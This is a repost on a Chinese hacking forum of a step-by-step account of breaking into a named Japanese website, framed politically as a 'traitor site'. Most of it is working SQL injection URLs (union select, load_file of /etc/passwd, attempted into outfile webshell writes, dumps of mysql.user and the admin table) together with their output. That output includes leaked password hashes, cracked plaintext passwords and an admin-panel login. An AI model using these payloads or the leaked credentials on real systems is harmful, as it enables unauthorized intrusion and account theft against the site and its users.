中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
1 t$ _" Q4 [4 `$ a
2 q& p6 w; M9 q
0x01. 检测
www.zuaa.jp
收集数据
; l5 @: D1 Q& Q" A1 X
[attach]73[/attach]
7 ^; M$ v- U9 V4 O6 c- h
7 k! t; m. m+ ~
whatweb
0 D. s, C& u/ e7 F2 [4 F2 O
[attach]74[/attach]
# S4 S' U4 e& B8 u- l; M
( l/ p) F% ^+ i7 D
利用NMAP扫描
7 s9 i# o1 _9 I+ p, u
[attach]75[/attach]
7 B" l8 G& k; q
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
7 g0 ?3 w" C/ M! ^6 ^! m& o: D
0x02.找注入点
, @ [. ?* [8 d# U- O0 g/ O
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
) Y! p7 C4 ]; P( F( K9 w
[attach]76[/attach]
. W1 O0 j A9 r/ B) B2 A
# k6 A7 V4 Q( l e/ y" A
0x03.order by
8 e1 R/ y2 ~2 N6 ^$ Z @1 e- S5 q
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
7 h7 A/ ^+ `3 |( w2 C
[attach]77[/attach]
4 t% J- F" f+ a& Q# `) _% R9 }
order by 28报错,order by 27正常
! y- l* G: {! f: J7 Q
$ ^" c- ?; y& P$ G, w, L
0x04. union手动查询
2 j0 C+ o& e7 b# }3 k! S% a) Z
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: I, r, m+ `# P4 ~
添加到 27 时正常显示
; _; I" M/ a, X4 e+ `2 R
[attach]78[/attach]
6 \& m" I9 d- ^8 D( B" T9 P
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
; z* H: _6 j" O" f
) Y8 `& n" p: W& m# I* {8 K
0x05. info:
3 [ h- \- ]+ V) A
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
/ ]$ [; c9 R B2 c
[attach]79[/attach]
& a2 _) N' W8 J# i( o. s5 [8 m# `
user: root@localhost
; d* y& L5 l+ Z
database: openpne
2 w( [; K4 X/ b8 S
version: 4.1.22
1 ~! O7 k1 ?) t- p8 c. r4 f0 n$ b" b
os: portbld-freebsd5.4
" K; g0 \2 c+ D7 S
( j6 u% o2 s, \) F% D( j+ T! X9 d
0x06. root用户
9 s9 j* k: {0 V: k+ t
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
. L& c( B5 I& \& W( }9 a9 Z7 }+ [
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
3 Q% m7 |0 K- _
[attach]80[/attach]
6 B! u4 \* D+ E$ N% i. D- @
通过工具转换
! z$ M$ L! p5 w( \
[attach]81[/attach]
) e- R4 [# W" K6 p
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
) k. X9 t$ l: W8 ~3 p
2 {+ `: E+ T) `/ p
0x07. 利用 into outfile
8 p/ H5 V) B* H* l3 c. s( g6 ]
全部都失败
9 ]# v3 D( a4 b; j
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
: R5 P: ^5 N) ]+ D. y& ~* ^# X
$ K; q" t, y% n3 C' r
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
1 o8 F4 h9 j" H* P6 w
|7 r+ Z4 z. N
页面显示“MDB2 Error:syntax error”
% k& K: y) ]6 y5 i
7 C3 R1 J. O3 C# F6 M, N
0x08. 利用 mysql 4.1
' y0 n0 Y/ R7 }! r# n b I
猜常规表名,字段未果 工具 sqlmap
" E& G7 m n4 e1 b
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
" Y+ R$ Z1 J" A8 s* v; E! {. _
0 p+ T0 d O/ R# F, M
[attach]82[/attach]
+ e4 F5 a/ `/ [' ~! I+ g
7 s- h, s) d3 q
0x09. 查找后台
% m4 l3 P; X$ F" M1 r
利用 现有的各种 后台工具尝试都不行
; |2 K: ~/ q9 Z( P( m8 o( }
_5 x# ?3 @! u# |4 m
0x10. MySL外联方法
+ f9 u% x4 l5 E. e h& X: \" G
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
; o9 K3 y& l+ {1 t+ I
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
. Q! ^' [! T8 G( l" U
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
& d/ d6 C$ J& ~$ Z V
[attach]83[/attach]
" Z: E4 W, u; x5 e3 h6 h. d ]* H6 x
这个可以在
www.cmd5.com
解密
& n% w; h, c. T
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
+ s1 ~6 L/ I' b5 R! K6 L1 R: R$ k% z( q
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
# \$ S4 I2 C8 g0 G5 M
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
4 i- b6 Y! P7 p9 S; }. M
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
. t4 o7 J! Y) m9 p/ I- C! c2 o
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
5 o" T0 ~' c% L& l# c8 c& q; H
[attach]84[/attach]
9 _6 u7 c* b" C1 x6 e2 Z7 }( u
3 N) }" S! _$ H' k) M7 a
0x11. 网站突破
" q8 R) d7 b* _
发现网站的源程序 openpne, google 下载 openpne 源码
) r Y( ^2 s, K$ n- r5 e2 G
[attach]85[/attach]
& Y( I& h- C6 c Q; v' T
& w3 u) c5 c' \, Y, }0 p
0x12. 默认信息利用
5 _; q1 r6 c$ M2 E
http://sns.zuaa.jp/?m=admin&a=page_login
% A- L$ c4 B4 O
[attach]86[/attach]
7 N4 M9 ~; _- e! V0 E( w* t( H
表名 (c_admin_user) ,字段名(username,password)
( L t- u t5 q; K, r: r1 v7 P6 E; v
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
& F ^( J1 Y1 ~# D, D5 ]
[attach]87[/attach]
! A$ }: x/ T- H0 K( u* Q
解密
0 k! D* ^; J8 N' T% p3 B' F
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
8 y) ]7 G' _3 Q! Z: @% T8 A% J9 e
zuaajp:c0923ec5857796a393da99905008c176, zju1897
& d4 }8 i" P6 H0 e+ ?1 C7 Z
C! O' i) N. z" V7 A, f
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
8 y! `. |+ W# q: H- v
# B, {# t3 ~) S3 S- W+ P! T4 p0 d
0x13. 登录后台
) F- W( ~; w8 q* D
[attach]88[/attach]
: ]6 I% G* H$ C! A
0 d+ q4 N$ P5 a' g6 _5 h" _
7 N' k8 U6 V- ?2 ^
0x14. 小结
: D, ~ z' w4 O# _" {
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
4 w ^4 G- X7 ?" M* W B
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
' S4 d3 @( _6 X
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
2 E& e2 ~. a" \6 ^6 f
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
* F6 j8 k, k* B! o6 r
; h: o. f N( B1 P
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
% Y' v4 S$ [/ Y0 ~
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2